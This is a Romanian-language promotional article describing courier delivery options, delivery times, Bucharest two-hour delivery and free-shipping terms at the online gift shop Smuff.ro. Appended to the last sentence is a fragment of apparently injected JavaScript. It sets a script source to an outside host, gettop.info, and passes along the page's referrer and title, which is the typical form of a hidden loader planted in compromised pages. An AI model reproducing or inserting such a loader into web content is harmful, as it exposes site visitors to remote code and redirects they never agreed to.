game-of-thrones-monopoly-smuff-1.950x670-adaptiveDe cate ori nu vi s-a intamplat sa intarziati la ziua unui sarbatorit deoarece firma de curierat a intarziat cu livrarea produsului comandat? Ei bine, nimeni nu-si doreste sa fie pus in aceasta situatie, motiv pentru care magazinul online Smuff.ro va pune la dispozitie servicii de livrare rapida, prin curierat. Indiferent de produsul comandat, acesta va ajunge la adresa dumneavoastra in cel mai scurt timp, dar si in cele mai bune conditii.

Livrarea se efectueaza pe intreg teritoriul tarii prin intermediul firmelor de curierat rapid Fan Courier, Bookurier sau Posta Romana. Care este termenul de livrare la Smuff.ro? Comanda dumneavoastra poate ajunge la destinatie in minim 24 de ore si maxim 5 saptamani. Desigur, avand in vedere ca sediul magazinului este in Targu Mures, livrarea poate dura mai mult daca solicitarea este primita dintr-un oras indepartat si invers.

Ce puteti comanda? Smuff.ro se distinge de alte magazine printr-o idee cat se poate de originala, aceea a cadourilor traznite. Puteti alege o multime de produse pentru el, ea, copii , cadouri corporate si business, scopul acestui magazin fiind satisfacerea clientilor aflati in cautarea cadoului perfect. Veti fi incantati de produsele disponibile, dar si de promptitudinea cu care va fi preluata comanda dumenavoastra si evident, livrata.

Afla mai multe despre livrarea in 120 de minute in Bucuresti!

Daca locuiti in capitala si ati dat comanda de un produs la acest magazin, veti ramane surprins sa aflati ca produsul va ajunge la dumenavoastra in 120 de minute. Cum este posibil? Smuff.ro isi rasplateste clientii cu produse de calitate superioara, profesionalism, dar si promptitudine. Tocmai de aceea, livrarile in municipiul Bucuresti sunt efectuate in 120 de minute in cazul inĀ  care doriti ca produsul comandat sa ajunga in cel mai scurt timp posibil la dumneavoastra.

Desigur, indiferent care este destinatia la care trebuie sa ajunga coletul, este important ca dumneavoastra sa cooperati cu reprezentantii magazinului si cei ai firmelor de curierat. Acestia trebuie sa stie adresa dumneavoastra exacta si au nevoie de un numar de telefon pentru a va contacta atunci cand sunt in apropiere. Receptia comenzii este foarte importanta pentru politica magazinului Smuff.ro, deoarece produsele trebuie sa ajunga in stare perfecta si sa multumeasca clientul.

Livrarea rapida poate fi si gratuita!

Ca orice magazin online, Smuff.ro se obliga sa-si respecte clientii si sa le ofere si serviciul de livrare gratuita, aceasta fiind efectuata la fel de rapid. Pentru a beneficia de acest serviciu gratuit, comanda dumneavoastra trebuie sa depaseasca valoare de 299 lei. Produsele vor ajunge in maxim 2 zile lucratoare din momentul in care acestea au fost expediate, iar dumneavoastra veti fi anuntati prin intermediul unui SMS cand trebuie sa soseasca acestea.

Asadar, Smuff.ro nu doar ca va ofera ajutor atunci cand ramaneti inspiratie, dar incearca si sa fie alaturi de dumneavoastra cu cele mai rapide servicii de livrare, promtitudinea fiind importanta. Indiferent ca livrarea se face prin Posta Romana, Fan Courier sau Bookurier, produsele vor ajunge la destinatie mai repede decat v-ati asteptat!s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;